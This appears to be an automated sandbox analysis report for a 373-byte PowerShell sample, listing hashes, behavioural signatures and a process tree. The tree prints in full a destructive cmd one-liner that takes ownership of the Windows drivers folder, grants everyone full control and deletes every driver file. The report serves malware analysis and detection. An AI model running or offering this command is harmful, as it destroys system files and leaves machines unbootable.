Analysis
-
max time kernel
143s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
13-08-2024 20:53
Static task
static1
Behavioral task
behavioral1
Sample
script.ps1
Resource
win7-20240704-en
6 signatures
150 seconds
General
-
Target
script.ps1
-
Size
373B
-
MD5
138825370aacd69bec42b835e992d4e8
-
SHA1
e7ca9d34065b73a700b5e8a5ae568da4f5d54bff
-
SHA256
cc378cee3365c7a74a92c524e37ba3abfa2638b0365a20fcfe78d77a7a172731
-
SHA512
93535adb74134f3d4f3a95a4585f10e19ddb800ffacd7044c676b4f74a6631254d15ee65fc1de11f83ab842397b22e2b2492ab7ecd3a5a106ff7f272b2c906ee
Malware Config
Signatures
-
Possible privilege escalation attempt 2 IoCs
Processes:
icacls.exetakeown.exepid process 1496 icacls.exe 3860 takeown.exe -
Modifies file permissions 1 TTPs 2 IoCs
Processes:
takeown.exeicacls.exepid process 3860 takeown.exe 1496 icacls.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 828 powershell.exe 828 powershell.exe 4132 powershell.exe 4132 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exetakeown.exepowershell.exedescription pid process Token: SeDebugPrivilege 828 powershell.exe Token: SeTakeOwnershipPrivilege 3860 takeown.exe Token: SeDebugPrivilege 4132 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
powershell.execmd.exedescription pid process target process PID 828 wrote to memory of 4072 828 powershell.exe cmd.exe PID 828 wrote to memory of 4072 828 powershell.exe cmd.exe PID 4072 wrote to memory of 3860 4072 cmd.exe takeown.exe PID 4072 wrote to memory of 3860 4072 cmd.exe takeown.exe PID 4072 wrote to memory of 1496 4072 cmd.exe icacls.exe PID 4072 wrote to memory of 1496 4072 cmd.exe icacls.exe PID 4072 wrote to memory of 4132 4072 cmd.exe powershell.exe PID 4072 wrote to memory of 4132 4072 cmd.exe powershell.exe
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\script.ps11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:828 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /k "takeown /f C:\Windows\System32\drivers\* >nul && icacls C:\Windows\System32\drivers\* /grant everyone:(f) >nul && del /s /q C:\Windows\System32\drivers\* >nul 2>&1 && powershell"2⤵
- Suspicious use of WriteProcessMemory
PID:4072 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\*3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3860
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\* /grant everyone:(f)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1496
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4132
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82